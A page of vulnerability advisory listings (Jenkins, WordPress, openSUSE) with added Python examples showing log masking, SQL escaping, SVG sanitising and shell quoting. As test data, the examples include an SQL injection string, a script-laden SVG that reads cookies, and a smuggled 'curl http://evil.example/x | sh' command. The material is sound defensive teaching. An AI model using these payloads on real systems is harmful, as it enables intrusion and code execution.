366 matches found
GHSA-VWQ9-CMQR-3C8C Insertion of Sensitive Information into Log File in Jenkins Configuration as Code Plugin
Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked, i.e. replaced with asterisks, in that log to prevent accidental disclosure. Between Configuration as Code Plugin 0.8-alpha and 1.0, log messages contained values if the...
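The masking the advisory describes, shown as an added example (not Configuration as Code Plugin's own code): a change line is logged with its value replaced by asterisks when the key looks like a secret, and a logging filter additionally scrubs the literal secret values from every record, so a value that leaks through some other message (a full config dump, an exception) is still masked. The key-name heuristic, the sample configuration and the logger name are assumptions made for the example.

```python
import logging
import re

# Assumption for this example: keys whose name looks like a secret hold secret values.
# A real system would track which settings are secrets explicitly.
SECRET_KEY_RE = re.compile(r"password|secret|token|api[_-]?key", re.IGNORECASE)

# Constructed sample configuration in the spirit of a CasC file, flattened to key/value pairs.
SAMPLE_CONFIG = {
    "jenkins.systemMessage": "CI for team X",
    "credentials.usernamePassword.password": "s3cr3t-hunter2",
    "git.globalConfigName": "ci-bot",
}

def unmasked_change_line(key, value):
    """The flawed pattern: log the applied value verbatim, whatever the key is."""
    return f"Applying {key} = {value}"

def masked_change_line(key, value):
    """Fixed pattern: replace the value with asterisks when the key looks like a secret."""
    shown = "****" if SECRET_KEY_RE.search(key) else value
    return f"Applying {key} = {shown}"

class SecretValueFilter(logging.Filter):
    """Second line of defence: scrub the literal secret values out of every record."""
    def __init__(self, secret_values):
        super().__init__()
        self.secret_values = [v for v in secret_values if v]

    def filter(self, record):
        text = record.getMessage()
        for value in self.secret_values:
            text = text.replace(value, "****")
        record.msg, record.args = text, ()   # already formatted; nothing left to interpolate
        return True

class ListHandler(logging.Handler):
    """Collects formatted lines in memory so the result can be inspected and tested."""
    def __init__(self):
        super().__init__()
        self.lines = []

    def emit(self, record):
        self.lines.append(self.format(record))

def apply_and_log(config):
    """Log each applied setting, then a careless full dump; return the lines the handler saw."""
    logger = logging.getLogger("casc-example")
    logger.handlers.clear()
    logger.filters.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = ListHandler()
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    secrets = [v for k, v in config.items() if SECRET_KEY_RE.search(k)]
    logger.addFilter(SecretValueFilter(secrets))
    for key, value in config.items():
        logger.info(masked_change_line(key, value))
    # Even a message that embeds the whole configuration is scrubbed by the filter.
    logger.info("Full configuration: %s", config)
    return handler.lines

if __name__ == "__main__":
    for line in apply_and_log(SAMPLE_CONFIG):
        print(line)
```

The filter is attached to the logger rather than the handler so it runs before any handler, including ones added later by other code; the value-based scrub is deliberately kept in addition to the key-based masking, because the key heuristic alone misses secrets that reach the log by another route.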
WordPress plugin "WP Statistics" vulnerable to cross-site scripting
Overview WordPress plugin "WP Statistics" provided by VeronaLabs contains a cross-site scripting vulnerability (CWE-79). Shogo Kumamaru of LAC CyberLink Co., Ltd reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. Impact...
GHSA-5PMP-7WC9-V7VW Cross-site Scripting in Jenkins JDK Parameter Plugin
Jenkins JDK Parameter Plugin 1.0 and earlier does not escape the name and description of JDK parameters on views displaying parameters. This results in stored cross-site scripting (XSS) vulnerabilities exploitable by attackers with Item/Configure permission. Exploitation of this vulnerability...
PT-2022-20407 · Jenkins · Blue Ocean Credentials Provider +2
Name of the Vulnerable Software and Affected Versions: Jenkins Pipeline SCM API for Blue Ocean Plugin versions 1.25.3 and earlier Description: The issue allows attackers with Job/Configure permission to access credentials with attacker-specified IDs stored in the private per-user credentials stor...
CLSA-2022-1646061262 Fix CVE(s): CVE-2022-24407
SECURITY UPDATE: SQL injection in SQL plugin - debian/patches/CVE-2022-24407.patch: escape password for SQL insert/update commands in plugins/sql.c. - CVE-2022-24407...
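The injection class this update patches, worked through as an added example (not the SQL plugin's or the Debian patch's code): a caller-supplied password pasted into an UPDATE statement lets the value close the string literal and rewrite the WHERE clause, whereas quote-escaping the value (the patch's approach) or binding it as a parameter keeps it as data. The table, the accounts and the attacker string are constructed for the example; SQLite is used only because it is available everywhere.

```python
import sqlite3

def make_db():
    """Constructed sample table: two accounts with placeholder password fields."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin-old"), ("alice", "alice-old")])
    conn.commit()
    return conn

def get_password(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row[0]

def set_password_vulnerable(conn, username, password):
    """The flawed pattern: the caller-supplied password is pasted into the statement text."""
    conn.execute(f"UPDATE users SET password = '{password}' WHERE username = '{username}'")
    conn.commit()

def set_password_escaped(conn, username, password):
    """The patch's approach: escape the quote character (SQL-92 doubling) before interpolating."""
    def esc(s):
        return s.replace("'", "''")
    conn.execute(f"UPDATE users SET password = '{esc(password)}' "
                 f"WHERE username = '{esc(username)}'")
    conn.commit()

def set_password_parameterized(conn, username, password):
    """The preferable approach: bind the value, so the driver never parses it as SQL."""
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (password, username))
    conn.commit()

# Constructed attacker input: a "password" that closes the literal, retargets the WHERE
# clause at the admin account and comments out the rest of the statement.
INJECTED_PASSWORD = "pwned' WHERE username = 'admin' --"

def demo():
    """Run the same 'alice changes her own password' call through all three variants."""
    results = {}
    for name, fn in (("vulnerable", set_password_vulnerable),
                     ("escaped", set_password_escaped),
                     ("parameterized", set_password_parameterized)):
        conn = make_db()
        fn(conn, "alice", INJECTED_PASSWORD)
        results[name] = (get_password(conn, "admin"), get_password(conn, "alice"))
    return results

if __name__ == "__main__":
    for name, (admin_pw, alice_pw) in demo().items():
        print(f"{name:14s} admin={admin_pw!r} alice={alice_pw!r}")
```

With the vulnerable variant the admin row is the one that changes and alice's is untouched; with the other two the injected string is stored verbatim as alice's password. Quote doubling is only correct for databases where the quote is the sole escape character; with MySQL's default settings a backslash also escapes, so the driver's own escaping function (or, better, parameter binding) should be used rather than a hand-rolled replace.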
WordPress Security Ninja – Secure Firewall & Secure Malware Scanner plugin < 5.136 - Toggle The Debug Mode via Cross-Site Request Forgery (CSRF) vulnerability
Toggle The Debug Mode via Cross-Site Request Forgery (CSRF) vulnerability discovered in WordPress Security Ninja – Secure Firewall & Secure Malware Scanner plugin versions < 5.136. Solution: Update the WordPress Security Ninja – Secure Firewall & Secure Malware Scanner plugin to the latest available...
WordPress Top News – Best News Plugin for WordPress plugin < 2.0 - Toggle The Debug Mode via Cross-Site Request Forgery (CSRF) vulnerability
Toggle The Debug Mode via Cross-Site Request Forgery (CSRF) vulnerability discovered in WordPress Top News – Best News Plugin for WordPress plugin versions < 2.0. Solution: Update the WordPress Top News – Best News Plugin for WordPress plugin to the latest available version, at least 2.0...
WordPress Plugin "Browser and Operating System Finder" vulnerable to cross-site request forgery
Overview WordPress Plugin "Browser and Operating System Finder" provided by Aftab Muni contains a cross-site request forgery vulnerability (CWE-352). imai shinpei of Cryptography Laboratory, Department of Information and Communication Engineering, Tokyo Denki University reported and coordinated with...
WordPress Plugin "Push Notifications for WordPress (Lite)" vulnerable to cross-site request forgery
Overview WordPress Plugin "Push Notifications for WordPress (Lite)" provided by Delite Studio contains a cross-site request forgery vulnerability (CWE-352). Ten Katouno of Cryptography Laboratory, Department of Information and Communication Engineering, Tokyo Denki University reported and coordinated...
WordPress Plugin "Booking Package - Appointment Booking Calendar System" vulnerable to cross-site scripting
Overview WordPress Plugin "Booking Package - Appointment Booking Calendar System" provided by Saasproject contains a cross-site scripting vulnerability (CWE-79) due to a flaw in handling some URL query parameters. Gen Sato of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IP...
EC-CUBE plugin "List (order management) item change plug-in" vulnerable to cross-site scripting
Overview EC-CUBE plugin "List (order management) item change plug-in" provided by shiro8 Co., Ltd. contains a cross-site scripting vulnerability (CWE-79). shiro8 Co., Ltd. reported this vulnerability to IPA to notify users of its solution through JVN. JPCERT/CC and shiro8 Co., Ltd. coordinated under...
Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting
The plugin does not properly sanitise or escape the Follow and Unfollow messages before outputting them in the page, which could allow high privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Timeline: May 18th, 2021 - Vendor...
Design/Logic Flaw
The WP SVG images WordPress plugin before 3.4 did not sanitise the SVG files uploaded, which could allow low privilege users such as author+ to upload a malicious SVG and then perform XSS attacks by inducing another user to access the file directly. In v3.4, the plugin restricted such upload to...
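What "sanitising the SVG files uploaded" has to cover, as an added example (not WP SVG images' code): an SVG is XML, so the script vectors are script elements, event-handler attributes (onload, onclick, ...) and href attributes whose scheme is javascript: once whitespace and control characters are stripped, which browsers ignore inside a scheme. The sample file and the allow/deny rules below are constructed for the example; they are a minimal set, not a complete SVG policy.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep the serialised output unprefixed
ET.register_namespace("xlink", XLINK_NS)

# Constructed sample: a "logo" carrying three script vectors next to one legitimate shape.
# The tab inside "java\tscript:" is deliberate; XML attribute normalisation turns it into a space.
MALICIOUS_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(1)">
  <script>alert(document.cookie)</script>
  <a xlink:href="java\tscript:alert(2)"><circle cx="50" cy="50" r="10" onclick="alert(3)"/></a>
  <rect width="5" height="5"/>
</svg>"""

FORBIDDEN_ELEMENTS = {"script", "foreignobject"}   # foreignObject can embed arbitrary HTML
_CONTROL_AND_SPACE = re.compile(r"[\s\x00-\x1f]+")

def _local_name(qualified):
    """'{namespace}tag' -> 'tag'."""
    return qualified.rsplit("}", 1)[-1]

def _dangerous_href(value):
    """True for script-bearing URLs. Whitespace/control characters are removed first because
    browsers ignore them inside the scheme, so 'java\\tscript:' executes just like 'javascript:'."""
    normalised = _CONTROL_AND_SPACE.sub("", value).lower()
    return (normalised.startswith("javascript:")
            or normalised.startswith("vbscript:")
            or (normalised.startswith("data:") and not normalised.startswith("data:image/")))

def _clean_attributes(elem, removed):
    for name in list(elem.attrib):
        local = _local_name(name).lower()
        if local.startswith("on") or (local == "href" and _dangerous_href(elem.attrib[name])):
            del elem.attrib[name]
            removed.append(f"attr:{local}")

def _clean_children(parent, removed):
    for child in list(parent):
        tag = _local_name(child.tag).lower()
        if tag in FORBIDDEN_ELEMENTS:
            parent.remove(child)
            removed.append(f"element:{tag}")
            continue
        _clean_attributes(child, removed)
        _clean_children(child, removed)

def sanitize_svg(data):
    """Return (sanitised SVG bytes, list describing what was removed)."""
    root = ET.fromstring(data)
    removed = []
    _clean_attributes(root, removed)
    _clean_children(root, removed)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True), removed

if __name__ == "__main__":
    cleaned, report = sanitize_svg(MALICIOUS_SVG)
    print(cleaned.decode())
    print("removed:", report)
```

Parsing with a real XML parser rather than regexes is the point: a regex that looks for `<script` misses namespaced or oddly-cased tags and encoded hrefs, while the tree walk sees the normalised document. For untrusted uploads in production, parse with defusedxml (or an equivalently hardened parser) to also cover entity-expansion attacks, and serve the result with a Content-Disposition or Content-Security-Policy header that stops it being rendered inline as a page.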
WordPress Plugin "WPCS - WordPress Currency Switcher" vulnerable to cross-site request forgery
Overview WordPress Plugin "WPCS - WordPress Currency Switcher" provided by realmag777 contains a cross-site request forgery vulnerability (CWE-352). Mizuki Takagi of Cryptography Laboratory, Department of Information and Communication Engineering, Tokyo Denki University reported and coordinated with...
JVN#63066062: WordPress Plugin "WordPress Popular Posts" vulnerable to cross-site scripting
WordPress Plugin "WordPress Popular Posts" provided by Hector Cabrera contains a cross-site scripting vulnerability (CWE-79). Impact: A user with administrative privilege may unintentionally execute a script in his/her web browser. Solution: Update the plugin according to the...
WordPress plugin "Fudousan plugin" series vulnerable to cross-site scripting
Overview Some plugins in the WordPress "Fudousan plugin" series provided by nendeb contain a cross-site scripting vulnerability (CWE-79). Yu Iwama of Secure Sky Technology Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning...
WordPress plugin "Paid Memberships Pro" vulnerable to SQL injection
Overview WordPress Plugin "Paid Memberships Pro" contains an SQL injection vulnerability (CWE-89). Gen Sato of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to the developer and coordinated on his own. After coordination was completed, this case was reported to JPCERT/CC, and...
OPENSUSE-SU-2020:2344-1 Security update for PackageKit
This update for PackageKit fixes the following issue: - CVE-2020-16121: Fixed an information disclosure in InstallFiles, GetFilesLocal and GetDetailsLocal (bsc#1176930). - Update summary and description of gstreamer-plugin and gtk3-module (bsc#1104313). This update was imported from the...
openSUSE Security Update : claws-mail (openSUSE-2020-1822)
This update for claws-mail fixes the following issues: - Additional cleanup of the template handling. claws-mail was updated to 3.17.8 (boo#1177967). - Shielded the template's |program and |attachprogram so that the command line that is executed does not allow sequencing such as with &&, || or ;, preventing...
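The "shielding" the claws-mail entry refers to, as an added example that is not claws-mail's code: a template expands a message-derived value into the command line of an external program, so an unquoted expansion lets `;`, `&&`, `||` or `|` in that value start a second command. Quoting each expanded value makes the shell treat it as a single word, and tokenising the line the way a POSIX shell would shows whether any control operator survives outside quotes. The program path, the message-derived argument and the operator list are assumptions made for the example.

```python
import shlex

# Constructed example: a template action that runs an external program with an argument
# taken from the message, the situation the |program{...} template is in.
PROGRAM = "/usr/local/bin/summarize"
MESSAGE_DERIVED_ARG = "Re: invoice; curl http://evil.example/x | sh"

# POSIX shell control operators (assumed list for the check below).
SHELL_OPERATORS = {";", ";;", "&&", "||", "|", "|&", "&", "(", ")"}

def build_command_unsafe(program, arg):
    """Verbatim expansion into a shell command line: ';' and '|' are live control operators."""
    return f"{program} {arg}"

def build_command_shielded(program, arg):
    """Quote every expanded value so the shell sees exactly one word per argument."""
    return " ".join(shlex.quote(part) for part in (program, arg))

def shell_tokens(command_line):
    """Tokenise as a POSIX shell would, keeping control operators as their own tokens
    and honouring quotes, so operators inside a quoted word are not split out."""
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)

def contains_sequencing(command_line):
    """The check the fix adds: is any control operator present outside quotes?"""
    return any(tok in SHELL_OPERATORS for tok in shell_tokens(command_line))

def argv_for_exec(program, arg):
    """Best option when the program needs no shell features: never build a shell string,
    hand an argv list straight to exec (subprocess.run(argv) without shell=True)."""
    return [program, arg]

if __name__ == "__main__":
    for label, line in (("unsafe  ", build_command_unsafe(PROGRAM, MESSAGE_DERIVED_ARG)),
                        ("shielded", build_command_shielded(PROGRAM, MESSAGE_DERIVED_ARG))):
        print(f"{label}: {line}")
        print(f"          tokens={shell_tokens(line)} sequencing={contains_sequencing(line)}")
```

The unsafe line tokenises to eight words including `;` and `|`, so the shell would run `curl ... | sh` after the intended program; the shielded line tokenises to the program and one quoted argument. The rejection check is a useful second layer, but quoting (or avoiding the shell entirely with an argv list) is what actually removes the ambiguity.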
WordPress Plugin "Social Sharing Plugin" vulnerable to cross-site request forgery
Overview WordPress Plugin "Social Sharing Plugin" provided by Social Rocket contains a cross-site request forgery vulnerability (CWE-352). Akio Furui of Cryptography Laboratory, Department of Information and Communication Engineering, Tokyo Denki University reported this vulnerability to the...